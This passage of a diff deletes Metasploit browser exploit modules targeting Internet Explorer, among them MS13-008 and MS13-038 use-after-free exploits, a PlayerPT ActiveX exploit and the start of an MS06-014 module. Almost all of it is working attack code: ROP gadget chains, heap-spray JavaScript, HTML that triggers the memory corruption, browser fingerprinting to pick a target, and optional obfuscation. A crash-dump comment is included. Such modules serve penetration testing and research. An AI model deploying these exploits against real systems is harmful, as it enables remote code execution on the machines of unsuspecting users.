|
||||
'SprayOffset' => '0x0',
|
||||
'OffsetStackBottom' => 3220
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 8 on Windows XP SP3',
|
||||
{
|
||||
'Spray' => false,
|
||||
'OffsetRop' => 160,
|
||||
'Offset' => 456,
|
||||
'Ret' => 0x1002c536, # ADD ESP,0A2C # RETN from PlayerPT.ocx
|
||||
'OffsetStackBottom' => 4108
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Mar 22 2012',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
||||
], self.class
|
||||
)
|
||||
|
||||
end
|
||||
|
||||
def get_spray(t, js_code, js_nops)
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
spray = <<-JS
|
||||
var heap_obj = new heapLib.ie(0x20000);
|
||||
var code = unescape("#{js_code}");
|
||||
var #{randnop} = "#{js_nops}";
|
||||
var nops = unescape(#{randnop});
|
||||
|
||||
while (nops.length < 0x80000) nops += nops;
|
||||
|
||||
var offset = nops.substring(0, #{t['SprayOffset']});
|
||||
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
|
||||
|
||||
while (shellcode.length < 0x40000) shellcode += shellcode;
|
||||
var block = shellcode.substring(0, (0x80000-6)/2);
|
||||
|
||||
heap_obj.gc();
|
||||
for (var z=1; z < #{t['SprayBlocks']}; z++) {
|
||||
heap_obj.alloc(block);
|
||||
}
|
||||
|
||||
JS
|
||||
|
||||
return spray
|
||||
|
||||
end
|
||||
|
||||
# rop chain generated with mona.py
|
||||
def create_rop_chain()
|
||||
|
||||
rop_gadgets =
|
||||
[
|
||||
0x77c2f271, # POP EBP # RETN [msvcrt.dll]
|
||||
0x77c2f271, # skip 4 bytes [msvcrt.dll]
|
||||
0x77c5335d, # POP EBX # RETN [msvcrt.dll]
|
||||
0xffffffff, #
|
||||
0x77c127e1, # INC EBX # RETN [msvcrt.dll]
|
||||
0x77c127e1, # INC EBX # RETN [msvcrt.dll]
|
||||
0x77c4e392, # POP EAX # RETN [msvcrt.dll]
|
||||
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
|
||||
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
|
||||
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
|
||||
0x77c34de1, # POP EAX # RETN [msvcrt.dll]
|
||||
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
|
||||
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
|
||||
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
|
||||
0x77c479e2, # POP EDI # RETN [msvcrt.dll]
|
||||
0x77c39f92, # RETN (ROP NOP) [msvcrt.dll]
|
||||
0x77c3b8ba, # POP ESI # RETN [msvcrt.dll]
|
||||
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
|
||||
0x77c4e392, # POP EAX # RETN [msvcrt.dll]
|
||||
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
|
||||
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
|
||||
0x77c51025, # ptr to 'push esp # ret ' [msvcrt.dll]
|
||||
].pack("V*")
|
||||
|
||||
return rop_gadgets
|
||||
end
|
||||
|
||||
def get_payload(my_target)
|
||||
|
||||
case my_target.name
|
||||
when /IE 6 on Windows XP SP3/
|
||||
my_payload = "\x0c" * my_target['OffsetStackBottom']
|
||||
return my_payload
|
||||
when /IE 7 on Windows XP SP3 \/ Windows Vista SP2/
|
||||
my_payload = "\x0c" * my_target['OffsetStackBottom']
|
||||
return my_payload
|
||||
when /IE 8 on Windows XP SP3/
|
||||
my_payload = rand_text_alpha(my_target['OffsetRop'])
|
||||
my_payload << create_rop_chain
|
||||
my_payload << make_nops(my_target['Offset'] - my_payload.length)
|
||||
my_payload << generate_seh_record(my_target.ret)
|
||||
my_payload << payload.encoded
|
||||
my_payload << rand_text_alpha(my_target['OffsetStackBottom'] - my_payload.length)
|
||||
return my_payload
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
|
||||
return targets[1] #IE 6 on Windows XP SP3
|
||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
|
||||
return targets[2] #IE 7 on Windows XP SP3
|
||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
|
||||
return targets[3] #IE 8 on Windows XP SP3
|
||||
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
|
||||
return targets[2] #IE 7 on Windows Vista SP2
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
print_status("User-agent: #{agent}")
|
||||
|
||||
my_target = get_target(agent)
|
||||
|
||||
# Avoid the attack if the victim doesn't have a setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
js = ""
|
||||
|
||||
if my_target['Spray']
|
||||
p = payload.encoded
|
||||
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
|
||||
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
|
||||
js = get_spray(my_target, js_code, js_nops)
|
||||
|
||||
js = heaplib(js, {:noobfu => true})
|
||||
|
||||
if datastore['OBFUSCATE']
|
||||
js = ::Rex::Exploitation::JSObfu.new(js)
|
||||
js.obfuscate(memory_sensitive: true)
|
||||
end
|
||||
end
|
||||
|
||||
sploit = get_payload(my_target)
|
||||
sploit = sploit.gsub(/"/, "\\\"")
|
||||
|
||||
html = <<-MYHTML
|
||||
<html>
|
||||
<head>
|
||||
<script>
|
||||
#{js}
|
||||
</script>
|
||||
</head>
|
||||
<body>
|
||||
<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' /></object>
|
||||
<script>
|
||||
obj.SetSource("","","","","#{sploit}");
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
MYHTML
|
||||
|
||||
html = html.gsub(/^ {4}/, '')
|
||||
|
||||
print_status("Sending html")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
end
|
|
@ -1,286 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::RopDb
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#autopwn_info({
|
||||
# :ua_name => HttpClients::IE,
|
||||
# :ua_minver => "8.0",
|
||||
# :ua_maxver => "8.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :rank => GoodRanking
|
||||
#})
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Microsoft Internet Explorer. A
|
||||
use-after-free condition occurs when a CButton object is freed, but a reference
|
||||
is kept and used again during a page reload, an invalid memory that's controllable
|
||||
is used, and allows arbitrary code execution under the context of the user.
|
||||
|
||||
Please note: This vulnerability has been exploited in the wild targeting
|
||||
mainly China/Taiwan/and US-based computers.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'eromang',
|
||||
'mahmud ab rahman',
|
||||
'juan vazquez', #Metasploit
|
||||
'sinn3r', #Metasploit
|
||||
'Peter Vreugdenhil' #New trigger & new exploit technique
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-4792' ],
|
||||
[ 'OSVDB', '88774' ],
|
||||
[ 'US-CERT-VU', '154201' ],
|
||||
[ 'BID', '57070' ],
|
||||
[ 'MSB', 'MS13-008' ],
|
||||
[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],
|
||||
[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],
|
||||
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],
|
||||
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ],
|
||||
[ 'URL', 'http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/' ],
|
||||
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00",
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],
|
||||
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
|
||||
[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],
|
||||
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Dec 27 2012",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
||||
])
|
||||
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
||||
|
||||
ie_name = "IE #{ie}"
|
||||
|
||||
case nt
|
||||
when '5.1'
|
||||
os_name = 'Windows XP SP3'
|
||||
when '5.2'
|
||||
os_name = 'Windows Server 2003'
|
||||
when '6.0'
|
||||
os_name = 'Windows Vista'
|
||||
when '6.1'
|
||||
os_name = 'Windows 7'
|
||||
else
|
||||
# OS not supported
|
||||
return nil
|
||||
end
|
||||
|
||||
targets.each do |t|
|
||||
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
|
||||
print_status("Target selected as: #{t.name}")
|
||||
return t
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
end
|
||||
|
||||
def junk(n=4)
|
||||
return rand_text_alpha(n).unpack("V")[0].to_i
|
||||
end
|
||||
|
||||
def nop
|
||||
return make_nops(4).unpack("V")[0].to_i
|
||||
end
|
||||
|
||||
def get_payload(t, cli)
|
||||
code = payload.encoded
|
||||
|
||||
# No rop. Just return the payload.
|
||||
return code if t['Rop'].nil?
|
||||
|
||||
# Make post code execution more stable
|
||||
code << rand_text_alpha(12000)
|
||||
|
||||
msvcrt_align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
java_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
|
||||
|
||||
rop_payload = ''
|
||||
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
case t.name
|
||||
when 'IE 8 on Windows XP SP3'
|
||||
rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
|
||||
when 'IE 8 on Windows Server 2003'
|
||||
rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
|
||||
end
|
||||
else
|
||||
rop_payload = generate_rop_payload('java', java_align + code)
|
||||
end
|
||||
|
||||
rop_payload
|
||||
end
|
||||
|
||||
def load_exploit_html(my_target, cli)
|
||||
|
||||
case my_target['Rop']
|
||||
when :msvcrt
|
||||
case my_target.name
|
||||
when 'IE 8 on Windows XP SP3'
|
||||
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
|
||||
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
|
||||
when 'IE 8 on Windows Server 2003'
|
||||
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
|
||||
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
|
||||
end
|
||||
else
|
||||
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
|
||||
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
|
||||
end
|
||||
|
||||
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
|
||||
js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
|
||||
|
||||
html = %Q|<!doctype html>
|
||||
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
|
||||
<head>
|
||||
<meta>
|
||||
<?IMPORT namespace="t" implementation="#default#time2">
|
||||
</meta>
|
||||
|
||||
<script>
|
||||
#{js_mstime_malloc}
|
||||
|
||||
|
||||
function helloWorld() {
|
||||
e_form = document.getElementById("formelm");
|
||||
e_div = document.getElementById("divelm");
|
||||
|
||||
for(i =0; i < 20; i++) {
|
||||
document.createElement('button');
|
||||
}
|
||||
e_div.appendChild(document.createElement('button'));
|
||||
e_div.firstChild.applyElement(e_form);
|
||||
|
||||
e_div.innerHTML = "";
|
||||
e_div.appendChild(document.createElement('body'));
|
||||
|
||||
CollectGarbage();
|
||||
|
||||
p = unescape("#{padding}");
|
||||
for (i=0; i < 3; i++) {
|
||||
p += unescape("#{padding}");
|
||||
}
|
||||
p += unescape("#{js_payload}");
|
||||
|
||||
fo = unescape("#{align_esp}");
|
||||
for (i=0; i < 55; i++) {
|
||||
if (i == 54) { fo += unescape("#{xchg_esp}"); }
|
||||
else { fo += unescape("#{align_esp}"); }
|
||||
}
|
||||
|
||||
fo += p;
|
||||
|
||||
mstime_malloc({shellcode:fo, heapBlockSize:0x58, objId:"myanim"});
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
|
||||
<body onload="eval(helloWorld())">
|
||||
<t:ANIMATECOLOR id="myanim"/>
|
||||
<div id="divelm"></div>
|
||||
<form id="formelm">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
||||
return html
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
agent = request.headers['User-Agent']
|
||||
uri = request.uri
|
||||
print_status("Requesting: #{uri}")
|
||||
|
||||
my_target = get_target(agent)
|
||||
# Avoid the attack if no suitable target found
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, sending 404: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
html = load_exploit_html(my_target, cli)
|
||||
html = html.gsub(/^ {4}/, '')
|
||||
print_status("Sending HTML...")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
=begin
|
||||
(87c.f40): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400
|
||||
eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
||||
mshtml!CMarkup::OnLoadStatusDone+0x504:
|
||||
637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????
|
||||
0:008> k
|
||||
ChildEBP RetAddr
|
||||
020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504
|
||||
020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47
|
||||
020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f
|
||||
020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12
|
||||
020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb
|
||||
020bfd78 7e418734 mshtml!GlobalWndProc+0x183
|
||||
020bfda4 7e418816 USER32!InternalCallWinProc+0x28
|
||||
020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150
|
||||
020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306
|
||||
020bfe7c 01252ec9 USER32!DispatchMessageW+0xf
|
||||
020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461
|
||||
020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1
|
||||
020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab
|
||||
020bffec 00000000 kernel32!BaseThreadStart+0x37
|
||||
|
||||
0:008> r
|
||||
eax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120
|
||||
eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
|
||||
mshtml!CMarkup::OnLoadStatusDone+0x504:
|
||||
637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????
|
||||
=end
|
|
@ -1,232 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::RopDb
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_minver => "8.0",
|
||||
:ua_maxver => "8.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
:rank => GoodRanking
|
||||
})
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Microsoft Internet Explorer. A
|
||||
use-after-free condition occurs when a CGenericElement object is freed, but a
|
||||
reference is kept on the Document and used again during rendering, an invalid
|
||||
memory that's controllable is used, and allows arbitrary code execution under the
|
||||
context of the user.
|
||||
|
||||
Please note: This vulnerability has been exploited in the wild on 2013 May, in
|
||||
the compromise of the Department of Labor (DoL) Website.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Unknown',
|
||||
'EMH',
|
||||
'juan vazquez', #RCA
|
||||
'sinn3r' #RCA
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-1347' ],
|
||||
[ 'OSVDB', '92993' ],
|
||||
[ 'MSB', 'MS13-038' ],
|
||||
[ 'US-CERT-VU', '237655' ],
|
||||
[ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],
|
||||
[ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00",
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],
|
||||
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
|
||||
[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],
|
||||
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "May 3 2013",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
||||
])
|
||||
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
||||
|
||||
ie_name = "IE #{ie}"
|
||||
|
||||
case nt
|
||||
when '5.1'
|
||||
os_name = 'Windows XP SP3'
|
||||
when '5.2'
|
||||
os_name = 'Windows Server 2003'
|
||||
when '6.0'
|
||||
os_name = 'Windows Vista'
|
||||
when '6.1'
|
||||
os_name = 'Windows 7'
|
||||
else
|
||||
# OS not supported
|
||||
return nil
|
||||
end
|
||||
|
||||
targets.each do |t|
|
||||
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
|
||||
print_status("Target selected as: #{t.name}")
|
||||
return t
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
end
|
||||
|
||||
def get_payload(t, cli)
|
||||
rop_payload = ''
|
||||
|
||||
# Extra junk in the end to make sure post code execution is stable.
|
||||
p = payload.encoded
|
||||
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
rop_payload = ''
|
||||
if t.name == 'IE 8 on Windows XP SP3'
|
||||
rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
|
||||
elsif t.name == 'IE 8 on Windows Server 2003'
|
||||
rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
|
||||
end
|
||||
|
||||
else
|
||||
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
|
||||
code << p
|
||||
code << rand_text_alpha(12000)
|
||||
|
||||
rop_payload = generate_rop_payload('java', code)
|
||||
end
|
||||
|
||||
return rop_payload
|
||||
end
|
||||
|
||||
def load_exploit_html(my_target, cli)
|
||||
case my_target['Rop']
|
||||
when :msvcrt
|
||||
case my_target.name
|
||||
when 'IE 8 on Windows XP SP3'
|
||||
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
|
||||
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
|
||||
when 'IE 8 on Windows Server 2003'
|
||||
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
|
||||
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
|
||||
end
|
||||
else
|
||||
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
|
||||
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
|
||||
end
|
||||
|
||||
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
|
||||
js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
|
||||
|
||||
|
||||
html = %Q|
|
||||
<!doctype html>
|
||||
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
|
||||
<head>
|
||||
<meta>
|
||||
<?IMPORT namespace="t" implementation="#default#time2">
|
||||
</meta>
|
||||
<script>
|
||||
#{js_mstime_malloc}
|
||||
|
||||
function helloWorld()
|
||||
{
|
||||
sparkle = unescape("ABCD");
|
||||
for (i=0; i < 2; i++) {
|
||||
sparkle += unescape("ABCD");
|
||||
}
|
||||
sparkle += unescape("AB");
|
||||
sparkle += unescape("#{js_payload}");
|
||||
magenta = unescape("#{align_esp}");
|
||||
for (i=0; i < 0x70/4; i++) {
|
||||
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
|
||||
else { magenta += unescape("#{align_esp}"); }
|
||||
}
|
||||
magenta += sparkle;
|
||||
|
||||
document.body.contentEditable="true";
|
||||
f0 = document.createElement('span');
|
||||
f1 = document.createElement('span');
|
||||
f2 = document.createElement('span');
|
||||
document.body.appendChild(f0);
|
||||
document.body.appendChild(f1);
|
||||
document.body.appendChild(f2);
|
||||
for (i=0; i < 20; i++) { document.createElement("img"); }
|
||||
f2.appendChild(document.createElement('datalist'));
|
||||
f1.appendChild(document.createElement('span'));
|
||||
CollectGarbage();
|
||||
f1.appendChild(document.createElement('table'));
|
||||
try { f0.offsetParent=null;}
|
||||
catch(e) { }
|
||||
f2.innerHTML = "";
|
||||
f1.innerHTML = "";
|
||||
f0.appendChild(document.createElement('hr'));
|
||||
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="eval(helloWorld());">
|
||||
<t:ANIMATECOLOR id="myanim"/>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
||||
return html
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
agent = request.headers['User-Agent']
|
||||
uri = request.uri
|
||||
print_status("Requesting: #{uri}")
|
||||
|
||||
my_target = get_target(agent)
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, sending 404: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
html = load_exploit_html(my_target, cli)
|
||||
html = html.gsub(/^ {4}/, '')
|
||||
print_status("Sending HTML...")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
end
|
|
@ -1,263 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::Seh
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::IE,
|
||||
# In badly misconfigured situations, IE7 and 8 could be vulnerable to
|
||||
# this, but by default they throw an ugly popup that stops all script
|
||||
# execution until the user deals with it and aborts everything if they
|
||||
# click "no". Not worth the risk of being unable to try more recent
|
||||
# exploits. Make sure service packs on top of 6.0 are considered less
|
||||
# than the max by setting to 6.1 (which doesn't really exist).
|
||||
:ua_maxver => "6.1",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
:method => [ 'CreateObject', 'GetObject' ],
|
||||
:classid =>
|
||||
[
|
||||
'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
|
||||
'{BD96C556-65A3-11D0-983A-00C04FC29E30}',
|
||||
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
|
||||
'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
|
||||
'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
|
||||
'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
|
||||
'{639F725F-1B2D-4831-A9FD-874847682010}',
|
||||
'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
|
||||
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
|
||||
'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
|
||||
'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
|
||||
'{0006F033-0000-0000-C000-000000000046}',
|
||||
'{0006F03A-0000-0000-C000-000000000046}',
|
||||
],
|
||||
#:rank => ExcellentRanking # reliable exe writer
|
||||
})
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a generic code execution vulnerability in Internet
|
||||
Explorer by abusing vulnerable ActiveX objects.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'hdm',
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
# MDAC
|
||||
[ 'MSB', 'MS06-014' ],
|
||||
[ 'CVE', '2006-0003' ],
|
||||
[ 'OSVDB', '24517' ],
|
||||
# WMI Object Broker
|
||||
[ 'MSB', 'MS06-073' ],
|
||||
[ 'CVE', '2006-4704' ],
|
||||
[ 'OSVDB', '30155' ],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2048,
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
|
||||
# Patched
|
||||
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],
|
||||
# Found in mpack
|
||||
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],
|
||||
|
||||
# Patched
|
||||
[ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],
|
||||
|
||||
# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
|
||||
